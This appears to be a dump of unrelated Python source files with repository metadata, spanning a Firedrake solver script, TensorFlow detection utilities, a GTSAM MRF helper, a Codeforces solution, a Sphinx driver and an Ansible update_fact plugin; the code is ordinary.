"pc_type": "python",
"pc_python_type": "firedrake.SCPC",
"pc_sc_eliminate_fields": "0, 1",
"condensed_field": {
"ksp_type": "preonly",
"pc_type": "lu",
"pc_factor_mat_solver_type": "mumps",
},
},
}
problem_flow = NonlinearVariationalProblem(F, DPP_solution)
solver_flow = NonlinearVariationalSolver(problem_flow, solver_parameters=solver_parameters)
solver_flow.solve()
# Writing solution in a .vtk file and plotting the solution
plot(DPP_solution.sub(1))
plot(DPP_solution.sub(4))
plt.show()
output_file = File("dpp_sdhm_exact.pvd")
v1_sol = DPP_solution.sub(0)
v1_sol.rename("Macro velocity", "label")
p1_sol = DPP_solution.sub(1)
p1_sol.rename("Macro pressure", "label")
v2_sol = DPP_solution.sub(3)
v2_sol.rename("Micro velocity", "label")
p2_sol = DPP_solution.sub(4)
p2_sol.rename("Micro pressure", "label")
output_file.write(p1_sol, v1_sol, p2_sol, v2_sol, p_e_1, v_e_1, p_e_2, v_e_2)
| 30.38806 | 100 | 0.58628 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,659 | 0.271611 |
3533347e3f6dd109c1cd29acee7a5024f75c5d7b | 329 | py | Python | data_sets/config.py | davidp94/data-sets | 5db986de4ff0e2656cce142541a46e66ca6f02db | [
"MIT"
] | null | null | null | data_sets/config.py | davidp94/data-sets | 5db986de4ff0e2656cce142541a46e66ca6f02db | [
"MIT"
] | null | null | null | data_sets/config.py | davidp94/data-sets | 5db986de4ff0e2656cce142541a46e66ca6f02db | [
"MIT"
] | null | null | null | """Definition and configuration of data sets"""
import functools
from data_sets import data_set
@functools.lru_cache(maxsize=None)
def data_sets() -> ['data_set.DataSet']:
"""All available data sets"""
return []
def charts_color() -> str:
"""The color (rgb hex code) to be used in charts"""
return '#008000' | 20.5625 | 55 | 0.680851 | 0 | 0 | 0 | 0 | 123 | 0.37386 | 0 | 0 | 154 | 0.468085 |
353598ee45be370c07fb9e8b962ed07021b6f3e8 | 578 | py | Python | photospicker/exception/abstract_exception.py | l-vo/photos-picker | 6790e0411bb46e3206ca778dbd83ddd1d4f90f21 | [
"MIT"
] | null | null | null | photospicker/exception/abstract_exception.py | l-vo/photos-picker | 6790e0411bb46e3206ca778dbd83ddd1d4f90f21 | [
"MIT"
] | 52 | 2018-08-31T05:57:04.000Z | 2019-02-19T15:26:40.000Z | photospicker/exception/abstract_exception.py | l-vo/photos-picker | 6790e0411bb46e3206ca778dbd83ddd1d4f90f21 | [
"MIT"
] | null | null | null | class AbstractException(Exception):
"""Abstract exception for project"""
def __init__(self, code, message):
"""
Constructor
:param int code: error code
:param str message: error message
"""
self._code = code
self._message = message
@property
def code(self):
"""
Getter code
:rtype: int
"""
return self._code
@property
def message(self): # pragma no cover
"""
Getter message
:rtype: str
"""
return self._message
| 18.645161 | 41 | 0.520761 | 577 | 0.99827 | 0 | 0 | 268 | 0.463668 | 0 | 0 | 282 | 0.487889 |
3535c2f41fec283317a2615b85df36199539b828 | 163 | py | Python | kafka/test/consume.py | nicovillanueva/docker-kafka | a3f229e9ebe28c947efe2be22bb88e54338c86e7 | [
"Apache-2.0"
] | null | null | null | kafka/test/consume.py | nicovillanueva/docker-kafka | a3f229e9ebe28c947efe2be22bb88e54338c86e7 | [
"Apache-2.0"
] | null | null | null | kafka/test/consume.py | nicovillanueva/docker-kafka | a3f229e9ebe28c947efe2be22bb88e54338c86e7 | [
"Apache-2.0"
] | null | null | null | from kafka import KafkaConsumer
consumer = KafkaConsumer('test-topic', bootstrap_servers='localhost:9092')
print("listening")
for msg in consumer:
print(msg)
| 23.285714 | 74 | 0.773006 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 39 | 0.239264 |
3535cde306fc5cbd97370f8331149b5039014dd2 | 9,354 | py | Python | recognition/train_utils.py | Queuer/queue-vision | a09cfcad11cb058049893a1ebeb74709e83eab2f | [
"Apache-2.0"
] | null | null | null | recognition/train_utils.py | Queuer/queue-vision | a09cfcad11cb058049893a1ebeb74709e83eab2f | [
"Apache-2.0"
] | 1 | 2016-12-18T16:07:55.000Z | 2016-12-18T16:07:55.000Z | recognition/train_utils.py | Queuer/queue-vision | a09cfcad11cb058049893a1ebeb74709e83eab2f | [
"Apache-2.0"
] | null | null | null | import random
import numpy as np
import tensorflow as tf
from recognition.utils import train_utils, googlenet_load
try:
from tensorflow.models.rnn import rnn_cell
except ImportError:
rnn_cell = tf.nn.rnn_cell
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
# Seed both RNGs so training runs are reproducible.
random.seed(0)
np.random.seed(0)
@ops.RegisterGradient("Hungarian")
def _hungarian_grad(op, *args):
    """Gradient for the custom 'Hungarian' matching op.

    The Hungarian assignment is a discrete matching, so no useful gradient
    flows through it; emit a zero tensor for every input instead.
    """
    # `map` returns a lazy iterator on Python 3, but TensorFlow expects a
    # sequence of gradient tensors, so build an explicit list.
    return [array_ops.zeros_like(inp) for inp in op.inputs]
def build_lstm_inner(H, lstm_input):
    """Build the recurrent (LSTM) decoder.

    Feeds the same per-cell feature vector into the LSTM for ``rnn_len``
    steps and collects one output tensor per step.
    """
    cell = rnn_cell.BasicLSTMCell(H['lstm_size'], forget_bias=0.0, state_is_tuple=False)
    lstm = (rnn_cell.MultiRNNCell([cell] * H['num_lstm_layers'], state_is_tuple=False)
            if H['num_lstm_layers'] > 1 else cell)

    num_cells = H['batch_size'] * H['grid_height'] * H['grid_width']
    state = tf.zeros([num_cells, lstm.state_size])

    outputs = []
    with tf.variable_scope('RNN', initializer=tf.random_uniform_initializer(-0.1, 0.1)):
        for step in range(H['rnn_len']):
            # Reuse the LSTM weights after the first timestep.
            if step > 0:
                tf.get_variable_scope().reuse_variables()
            output, state = lstm(lstm_input, state)
            outputs.append(output)
    return outputs
def build_overfeat_inner(H, lstm_input):
    """Build the simple (non-recurrent) Overfeat decoder.

    A single fully-connected projection of the CNN features; only one
    output step is supported, so ``rnn_len`` must be 1.
    """
    if H['rnn_len'] > 1:
        raise ValueError('rnn_len > 1 only supported with use_lstm == True')
    init = tf.random_uniform_initializer(-0.1, 0.1)
    with tf.variable_scope('Overfeat', initializer=init):
        ip = tf.get_variable('ip', shape=[H['later_feat_channels'], H['lstm_size']])
        return [tf.matmul(lstm_input, ip)]
def deconv(x, output_shape, channels):
    """2x2, stride-2 transposed convolution (learned upsampling).

    ``channels`` is ``[in_channels, out_channels]`` of the upsampling.
    """
    kernel = 2
    w = tf.get_variable('w_deconv',
                        initializer=tf.random_normal_initializer(stddev=0.01),
                        shape=[kernel, kernel, channels[1], channels[0]])
    return tf.nn.conv2d_transpose(x, w, output_shape,
                                  strides=[1, kernel, kernel, 1], padding='VALID')
def rezoom(H, pred_boxes, early_feat, early_feat_channels, w_offsets, h_offsets):
    '''
    Rezoom into a feature map at multiple interpolation points in a grid.
    If the predicted object center is at X, len(w_offsets) == 3, and len(h_offsets) == 5,
    the rezoom grid will look as follows:
    [o o o]
    [o o o]
    [o X o]
    [o o o]
    [o o o]
    Where each letter indexes into the feature map with bilinear interpolation
    '''
    grid_size = H['grid_width'] * H['grid_height']
    outer_size = grid_size * H['batch_size']
    # One bilinear lookup per (w, h) grid offset around each predicted box.
    indices = []
    for w_offset in w_offsets:
        for h_offset in h_offsets:
            indices.append(train_utils.bilinear_select(H,
                                                       pred_boxes,
                                                       early_feat,
                                                       early_feat_channels,
                                                       w_offset, h_offset))
    interp_indices = tf.concat(0, indices)
    rezoom_features = train_utils.interp(early_feat,
                                         interp_indices,
                                         early_feat_channels)
    # Split the stacked lookups back out: (num_offsets, outer, rnn_len, C).
    rezoom_features_r = tf.reshape(rezoom_features,
                                   [len(w_offsets) * len(h_offsets),
                                    outer_size,
                                    H['rnn_len'],
                                    early_feat_channels])
    # Move the offset axis inward so all features of one cell are contiguous.
    rezoom_features_t = tf.transpose(rezoom_features_r, [1, 2, 0, 3])
    # Flatten offsets x channels into one feature vector per (cell, timestep).
    return tf.reshape(rezoom_features_t,
                      [outer_size,
                       H['rnn_len'],
                       len(w_offsets) * len(h_offsets) * early_feat_channels])
def build_forward(H, x, phase, reuse):
    '''
    Construct the forward model
    '''
    grid_size = H['grid_width'] * H['grid_height']
    outer_size = grid_size * H['batch_size']
    # Mean-subtract the input (GoogLeNet-style preprocessing constant).
    input_mean = 117.
    x -= input_mean
    cnn, early_feat, _ = googlenet_load.model(x, H, reuse)
    early_feat_channels = H['early_feat_channels']
    early_feat = early_feat[:, :, :, :early_feat_channels]
    if H['deconv']:
        # Downsample with a strided conv, smooth part of the channels, then
        # learn an upsampling back to grid resolution and mix with originals.
        size = 3
        stride = 2
        pool_size = 5
        with tf.variable_scope("deconv", reuse=reuse):
            w = tf.get_variable('conv_pool_w', shape=[size, size, H['later_feat_channels'], H['later_feat_channels']],
                                initializer=tf.random_normal_initializer(stddev=0.01))
            cnn_s = tf.nn.conv2d(cnn, w, strides=[1, stride, stride, 1], padding='SAME')
            cnn_s_pool = tf.nn.avg_pool(cnn_s[:, :, :, :256], ksize=[1, pool_size, pool_size, 1],
                                        strides=[1, 1, 1, 1], padding='SAME')
            cnn_s_with_pool = tf.concat(3, [cnn_s_pool, cnn_s[:, :, :, 256:]])
            cnn_deconv = deconv(cnn_s_with_pool, output_shape=[H['batch_size'], H['grid_height'], H['grid_width'], 256],
                                channels=[H['later_feat_channels'], 256])
            cnn = tf.concat(3, (cnn_deconv, cnn[:, :, :, 256:]))
    elif H['avg_pool_size'] > 1:
        # Smooth only the channels past the first 700 with average pooling.
        pool_size = H['avg_pool_size']
        cnn1 = cnn[:, :, :, :700]
        cnn2 = cnn[:, :, :, 700:]
        cnn2 = tf.nn.avg_pool(cnn2, ksize=[1, pool_size, pool_size, 1],
                              strides=[1, 1, 1, 1], padding='SAME')
        cnn = tf.concat(3, [cnn1, cnn2])
    # Flatten spatial grid: one feature row per (batch, cell).
    cnn = tf.reshape(cnn,
                     [H['batch_size'] * H['grid_width'] * H['grid_height'], H['later_feat_channels']])
    initializer = tf.random_uniform_initializer(-0.1, 0.1)
    with tf.variable_scope('decoder', reuse=reuse, initializer=initializer):
        scale_down = 0.01
        lstm_input = tf.reshape(cnn * scale_down, (H['batch_size'] * grid_size, H['later_feat_channels']))
        if H['use_lstm']:
            lstm_outputs = build_lstm_inner(H, lstm_input)
        else:
            lstm_outputs = build_overfeat_inner(H, lstm_input)
        # Per-timestep box regression (4 coords) and per-class logits.
        pred_boxes = []
        pred_logits = []
        for k in range(H['rnn_len']):
            output = lstm_outputs[k]
            if phase == 'train':
                output = tf.nn.dropout(output, 0.5)
            box_weights = tf.get_variable('box_ip%d' % k,
                                          shape=(H['lstm_size'], 4))
            conf_weights = tf.get_variable('conf_ip%d' % k,
                                           shape=(H['lstm_size'], H['num_classes']))
            pred_boxes_step = tf.reshape(tf.matmul(output, box_weights) * 50,
                                         [outer_size, 1, 4])
            pred_boxes.append(pred_boxes_step)
            pred_logits.append(tf.reshape(tf.matmul(output, conf_weights),
                                          [outer_size, 1, H['num_classes']]))
        pred_boxes = tf.concat(1, pred_boxes)
        pred_logits = tf.concat(1, pred_logits)
        # Softmax over classes, applied independently per (cell, timestep).
        pred_logits_squash = tf.reshape(pred_logits,
                                        [outer_size * H['rnn_len'], H['num_classes']])
        pred_confidences_squash = tf.nn.softmax(pred_logits_squash)
        pred_confidences = tf.reshape(pred_confidences_squash,
                                      [outer_size, H['rnn_len'], H['num_classes']])
        if H['use_rezoom']:
            # Re-extract early features at the predicted boxes and learn
            # residual corrections for confidences (and optionally boxes).
            pred_confs_deltas = []
            pred_boxes_deltas = []
            w_offsets = H['rezoom_w_coords']
            h_offsets = H['rezoom_h_coords']
            num_offsets = len(w_offsets) * len(h_offsets)
            rezoom_features = rezoom(H, pred_boxes, early_feat, early_feat_channels, w_offsets, h_offsets)
            if phase == 'train':
                rezoom_features = tf.nn.dropout(rezoom_features, 0.5)
            for k in range(H['rnn_len']):
                delta_features = tf.concat(1, [lstm_outputs[k], rezoom_features[:, k, :] / 1000.])
                dim = 128
                delta_weights1 = tf.get_variable(
                    'delta_ip1%d' % k,
                    shape=[H['lstm_size'] + early_feat_channels * num_offsets, dim])
                # TODO: add dropout here ?
                ip1 = tf.nn.relu(tf.matmul(delta_features, delta_weights1))
                if phase == 'train':
                    ip1 = tf.nn.dropout(ip1, 0.5)
                delta_confs_weights = tf.get_variable(
                    'delta_ip2%d' % k,
                    shape=[dim, H['num_classes']])
                if H['reregress']:
                    delta_boxes_weights = tf.get_variable(
                        'delta_ip_boxes%d' % k,
                        shape=[dim, 4])
                    pred_boxes_deltas.append(tf.reshape(tf.matmul(ip1, delta_boxes_weights) * 5,
                                                        [outer_size, 1, 4]))
                scale = H.get('rezoom_conf_scale', 50)
                pred_confs_deltas.append(tf.reshape(tf.matmul(ip1, delta_confs_weights) * scale,
                                                    [outer_size, 1, H['num_classes']]))
            pred_confs_deltas = tf.concat(1, pred_confs_deltas)
            if H['reregress']:
                pred_boxes_deltas = tf.concat(1, pred_boxes_deltas)
            return pred_boxes, pred_logits, pred_confidences, pred_confs_deltas, pred_boxes_deltas
    return pred_boxes, pred_logits, pred_confidences
| 41.758929 | 120 | 0.557943 | 0 | 0 | 0 | 0 | 114 | 0.012187 | 0 | 0 | 1,456 | 0.155655 |
35361b12a2145f1e12f1ea888df65fc33ccd836c | 1,627 | py | Python | gtbook/linear.py | dellaert/nbdev_test | 793932be45ad75f0f1f0a03af6e4ae41e54b7857 | [
"Apache-2.0"
] | 5 | 2021-12-19T02:58:48.000Z | 2021-12-22T20:12:54.000Z | gtbook/linear.py | dellaert/nbdev_test | 793932be45ad75f0f1f0a03af6e4ae41e54b7857 | [
"Apache-2.0"
] | 2 | 2022-01-08T14:58:20.000Z | 2022-01-10T02:25:31.000Z | gtbook/linear.py | dellaert/nbdev_test | 793932be45ad75f0f1f0a03af6e4ae41e54b7857 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: linear.ipynb (unless otherwise specified).
__all__ = ['vv', 'denoising_MRF']
# Cell
import numpy as np
import gtsam
from gtsam import noiseModel
from .display import show
from typing import Dict
# Cell
def vv(keys_vectors: Dict[int, np.ndarray]):
    """Build a gtsam.VectorValues from a {key: vector} mapping."""
    values = gtsam.VectorValues()
    for key, vector in keys_vectors.items():
        values.insert(key, vector)
    return values
# Cell
def denoising_MRF(M: int, N: int, sigma = 0.5, smoothness_sigma=0.5):
    """Create MxN MRF
    @returns graph and symbols used for rows.
    """
    # One gtsam symbol per pixel: row letter ('a', 'b', ...) + 1-based column.
    row_symbols = [chr(ord('a')+row) for row in range(M)]
    keys = {(row, col): gtsam.symbol(row_symbols[row], col+1)
            for row in range(M) for col in range(N)}
    # Synthetic noisy measurements; fixed seed keeps the graph reproducible.
    rng = np.random.default_rng(42)
    data = rng.normal(loc=0, scale=sigma, size=(M, N, 1))
    data_model = noiseModel.Isotropic.Sigmas([sigma])
    smoothness_model = noiseModel.Isotropic.Sigmas([smoothness_sigma])
    # 1x1 identity / zero blocks for the scalar-per-pixel factors.
    I = np.eye(1, 1, dtype=float)
    zero = np.zeros((1, 1))
    graph = gtsam.GaussianFactorGraph()
    for row in range(M):
        for col in range(N):
            # add data terms:
            j = keys[(row, col)]
            graph.add(j, I, np.array(data[row, col]), data_model)
            # add smoothness terms:
            if col > 0:
                j1 = keys[(row, col-1)]
                graph.add(j, I, j1, -I, zero, smoothness_model)
            if row > 0:
                j2 = keys[(row-1, col)]
                graph.add(j, I, j2, -I, zero, smoothness_model)
    return graph, row_symbols
# Cell
| 29.053571 | 86 | 0.598648 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 287 | 0.176398 |
3539dc514be01a0a70e432b9eaf2771e8b35648e | 899 | py | Python | _0697_div3/D_Cleaning_the_Phone.py | mingweihe/codeforces | 8395d68a09373775009b76dbde189ce5bbba58ae | [
"MIT"
] | null | null | null | _0697_div3/D_Cleaning_the_Phone.py | mingweihe/codeforces | 8395d68a09373775009b76dbde189ce5bbba58ae | [
"MIT"
] | null | null | null | _0697_div3/D_Cleaning_the_Phone.py | mingweihe/codeforces | 8395d68a09373775009b76dbde189ce5bbba58ae | [
"MIT"
def solve(n, m, A, B):
    """Minimum convenience points needed to free at least m memory.

    A[i] is the memory freed by removing app i; B[i] in {1, 2} is that
    app's convenience cost.  Greedy over the two cost classes: repeatedly
    take either up to two of the largest 1-point apps or the largest
    2-point app, whichever frees more memory per 2 convenience points.

    :returns: minimum total convenience cost, or -1 if even removing
        every app frees less than m.
    """
    ans = 0
    ones, twos = [], []
    # range (not xrange) keeps this correct on both Python 2 and 3.
    for i in range(n):
        if B[i] == 1:
            ones.append(A[i])
        else:
            twos.append(A[i])
    ones.sort()
    twos.sort()
    i, j = len(ones) - 1, len(twos) - 1
    while m > 0 and (i >= 0 or j >= 0):
        # A single 1-point app already covers the remaining need: done.
        if i >= 0 and ones[i] >= m:
            m -= ones[i]
            ans += 1
            break
        mem1, mem2 = float('-inf'), float('-inf')
        if i == 0:
            mem1 = ones[i]
        elif i > 0:
            mem1 = ones[i] + ones[i - 1]
        if j >= 0:
            mem2 = twos[j]
        if mem1 >= mem2:
            # Two best 1-point apps beat (or tie) the best 2-point app,
            # but only commit the larger one and re-evaluate next loop.
            m -= ones[i]
            i -= 1
            ans += 1
        else:
            m -= mem2
            j -= 1
            ans += 2
    return -1 if m > 0 else ans
# Python 2 stdin driver: first line is the number of test cases; each case
# is a line "n m" followed by the memory (A) and convenience (B) arrays.
for _ in xrange(int(raw_input())):
    n, m = map(int, raw_input().split())
    A = map(int, raw_input().split())
    B = map(int, raw_input().split())
    print solve(n, m, A, B)
| 26.441176 | 49 | 0.404894 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 12 | 0.013348 |
353a5d55eb876f494195bab8603dd502b77f30e8 | 1,319 | py | Python | xpcs/calc_scattering.py | aryabhatt/xpcs-baseline | ad88044d1ec391dc1dd44d5b8f372a16e5c7d431 | [
"BSD-2-Clause"
] | null | null | null | xpcs/calc_scattering.py | aryabhatt/xpcs-baseline | ad88044d1ec391dc1dd44d5b8f372a16e5c7d431 | [
"BSD-2-Clause"
] | 1 | 2020-03-23T22:54:40.000Z | 2020-03-23T22:54:40.000Z | xpcs/calc_scattering.py | aryabhatt/xpcs-baseline | ad88044d1ec391dc1dd44d5b8f372a16e5c7d431 | [
"BSD-2-Clause"
] | 4 | 2019-08-30T12:12:59.000Z | 2021-12-28T06:33:07.000Z | #! /usr/bin/env python
import mdscatter
import numpy as np
import h5py
import time
import os
from loader import list_lammps_txt_files, load_lammps_txt
from detector import Lambda750k
if __name__ == '__main__':
wavelen = 0.1127
energy = 1.23984 / wavelen
sdd = 4.
scale = 28
center = (0, 768)
# read data
datadir = '../lammps'
pattern = 'al.*.txt'
txtfiles = list_lammps_txt_files(datadir, pattern)
Nsteps = len(txtfiles)
# load detector
detector = Lambda750k()
qvecs = detector.qvectors(sdd, center, wavelen)
# output hdf5 file
outf = 'xpcs.h5'
h5f = h5py.File(outf, 'w')
grp = h5f.create_group('xpcs')
dset = grp.create_dataset('imgs', (Nsteps, *detector.shape), 'f')
qtmp = grp.create_dataset('q_points', (*detector.shape, 3), 'f')
qtmp[:] = qvecs.reshape(*detector.shape, 3)
# turn the crank
t0 = time.time()
for i in range(Nsteps):
mdsim = load_lammps_txt(txtfiles[i], origin=np.array([8, 8, 8]), scale=scale)
pts = mdsim['POSITIONS']
img = mdscatter.dft(pts, qvecs)
img = np.abs(img)**2
img = np.reshape(img, detector.shape)
dset[i,:,:] = np.reshape(img, detector.shape)
t1 = time.time() - t0
print('time taken = %f\n' % t1)
h5f.close()
| 25.365385 | 85 | 0.611069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 183 | 0.138741 |
353add44ddd63c2400e5193caf4b4d8f081b481a | 895 | py | Python | sphinxcontrib/collections/drivers/copy_file.py | useblocks/sphinx-collections | 4f1fd7d4f4682a2df47cdde98b9668d59b2983ff | [
"MIT"
] | 4 | 2020-05-22T16:22:14.000Z | 2021-11-09T11:48:04.000Z | sphinxcontrib/collections/drivers/copy_file.py | useblocks/sphinx-collections | 4f1fd7d4f4682a2df47cdde98b9668d59b2983ff | [
"MIT"
] | 1 | 2020-07-10T23:03:24.000Z | 2020-07-10T23:03:24.000Z | sphinxcontrib/collections/drivers/copy_file.py | useblocks/sphinx-collections | 4f1fd7d4f4682a2df47cdde98b9668d59b2983ff | [
"MIT"
] | 1 | 2020-05-22T17:27:39.000Z | 2020-05-22T17:27:39.000Z | import os
from shutil import copyfile
from sphinxcontrib.collections.drivers import Driver
class CopyFileDriver(Driver):
    """Collection driver that copies a single file from source to target."""

    def run(self):
        """Copy the configured source file to the configured target path."""
        self.info('Copy file...')
        source = self.config['source']
        if not os.path.exists(source):
            self.error('Source {} does not exist'.format(source))
            return
        try:
            copyfile(source, self.config['target'])
        except IOError as e:
            self.error('Problems during copying file.', e)

    def clean(self):
        """Remove the copied target file; a missing file is not an error."""
        target = self.config['target']
        try:
            os.remove(target)
            self.info('File deleted: {}'.format(target))
        except FileNotFoundError:
            pass  # already gone -- nothing to clean up
        except IOError as e:
            self.error('Problems during cleaning for collection {}'.format(self.config['name']), e)
353b5a343ec76d28979a240a4db7c75dd7f261d3 | 6,598 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/ansible/utils/plugins/action/update_fact.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 1 | 2020-01-22T13:11:23.000Z | 2020-01-22T13:11:23.000Z | venv/lib/python3.6/site-packages/ansible_collections/ansible/utils/plugins/action/update_fact.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/ansible/utils/plugins/action/update_fact.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import ast
import re
from ansible.plugins.action import ActionBase
from ansible.module_utils.common._collections_compat import (
MutableMapping,
MutableSequence,
)
from ansible.module_utils._text import to_native
from jinja2 import Template, TemplateSyntaxError
from ansible_collections.ansible.utils.plugins.modules.update_fact import (
DOCUMENTATION,
)
from ansible_collections.ansible.utils.plugins.module_utils.common.argspec_validate import (
AnsibleArgSpecValidator,
)
from ansible.errors import AnsibleActionFail
class ActionModule(ActionBase):
    """action module"""
    def __init__(self, *args, **kwargs):
        """Start here"""
        super(ActionModule, self).__init__(*args, **kwargs)
        self._supports_async = True
        self._updates = None  # reserved for the parsed 'updates' task option
        self._result = None  # result dict handed back to the Ansible runner
    def _check_argspec(self):
        # Validate the task arguments against the module DOCUMENTATION schema;
        # aav.validate() also normalizes self._task.args in place.
        aav = AnsibleArgSpecValidator(
            data=self._task.args, schema=DOCUMENTATION, name=self._task.action
        )
        valid, errors, self._task.args = aav.validate()
        if not valid:
            raise AnsibleActionFail(errors)
    def _ensure_valid_jinja(self):
        """Ensure each path is jinja valid"""
        errors = []
        for entry in self._task.args["updates"]:
            try:
                # Wrapping the path in {{ }} and compiling it catches
                # malformed paths before any fact is touched.
                Template("{{" + entry["path"] + "}}")
            except TemplateSyntaxError as exc:
                error = (
                    "While processing '{path}' found malformed path."
                    " Ensure syntax follows valid jinja format. The error was:"
                    " {error}"
                ).format(path=entry["path"], error=to_native(exc))
                errors.append(error)
        if errors:
            raise AnsibleActionFail(" ".join(errors))
    @staticmethod
    def _field_split(path):
        """Split the path into its parts
        e.g. "a.b[0]['c']" -> ['a', 'b', 0, 'c']
        :param path: The user provided path
        :type path: str
        :return: the individual parts of the path
        :rtype: list
        """
        que = list(path)
        val = que.pop(0)
        fields = []
        try:
            while True:
                field = ""
                # found a '.', move to the next character
                if val == ".":
                    val = que.pop(0)
                # found a '[', pop until ']' and then get the next
                if val == "[":
                    val = que.pop(0)
                    while val != "]":
                        field += val
                        val = que.pop(0)
                    val = que.pop(0)
                else:
                    while val not in [".", "["]:
                        field += val
                        val = que.pop(0)
                try:
                    # make numbers numbers
                    fields.append(ast.literal_eval(field))
                except Exception:
                    # or strip the quotes
                    fields.append(re.sub("['\"]", "", field))
        except IndexError:
            # pop'ed past the end of the que
            # so add the final field
            try:
                fields.append(ast.literal_eval(field))
            except Exception:
                fields.append(re.sub("['\"]", "", field))
        return fields
    def set_value(self, obj, path, val):
        """Set a value
        Walks ``obj`` along ``path`` recursively and assigns ``val`` at the
        final component, flipping self._result['changed'] only on real change.
        :param obj: The object to modify
        :type obj: mutable object
        :param path: The path to where the update should be made
        :type path: list
        :param val: The new value to place at path
        :type val: string, dict, list, bool, etc
        """
        first, rest = path[0], path[1:]
        if rest:
            # Descend one level; missing keys / non-subscriptables are fatal.
            try:
                new_obj = obj[first]
            except (KeyError, TypeError):
                msg = (
                    "Error: the key '{first}' was not found "
                    "in {obj}.".format(obj=obj, first=first)
                )
                raise AnsibleActionFail(msg)
            self.set_value(new_obj, rest, val)
        else:
            if isinstance(obj, MutableMapping):
                # Only report a change when the stored value actually differs.
                if obj.get(first) != val:
                    self._result["changed"] = True
                obj[first] = val
            elif isinstance(obj, MutableSequence):
                if not isinstance(first, int):
                    msg = (
                        "Error: {obj} is a list, "
                        "but index provided was not an integer: '{first}'"
                    ).format(obj=obj, first=first)
                    raise AnsibleActionFail(msg)
                if first > len(obj):
                    msg = "Error: {obj} not long enough for item #{first} to be set.".format(
                        obj=obj, first=first
                    )
                    raise AnsibleActionFail(msg)
                if first == len(obj):
                    # Index exactly one past the end appends a new element.
                    obj.append(val)
                    self._result["changed"] = True
                else:
                    if obj[first] != val:
                        obj[first] = val
                        self._result["changed"] = True
            else:
                msg = "update_fact can only modify mutable objects."
                raise AnsibleActionFail(msg)
    def run(self, tmp=None, task_vars=None):
        """action entry point"""
        self._task.diff = False
        self._result = super(ActionModule, self).run(tmp, task_vars)
        self._result["changed"] = False
        self._check_argspec()
        results = set()
        self._ensure_valid_jinja()
        for entry in self._task.args["updates"]:
            # First path component names the fact; the rest index into it.
            parts = self._field_split(entry["path"])
            obj, path = parts[0], parts[1:]
            results.add(obj)
            if obj not in task_vars["vars"]:
                msg = "'{obj}' was not found in the current facts.".format(
                    obj=obj
                )
                raise AnsibleActionFail(msg)
            retrieved = task_vars["vars"].get(obj)
            if path:
                self.set_value(retrieved, path, entry["value"])
            else:
                # Bare fact name with no sub-path: replace the whole fact.
                if task_vars["vars"][obj] != entry["value"]:
                    task_vars["vars"][obj] = entry["value"]
                    self._result["changed"] = True
        for key in results:
            # Echo every touched fact back so it is re-registered like set_fact.
            value = task_vars["vars"].get(key)
            self._result[key] = value
        return self._result
| 35.473118 | 93 | 0.507426 | 5,824 | 0.882692 | 0 | 0 | 1,484 | 0.224917 | 0 | 0 | 1,477 | 0.223856 |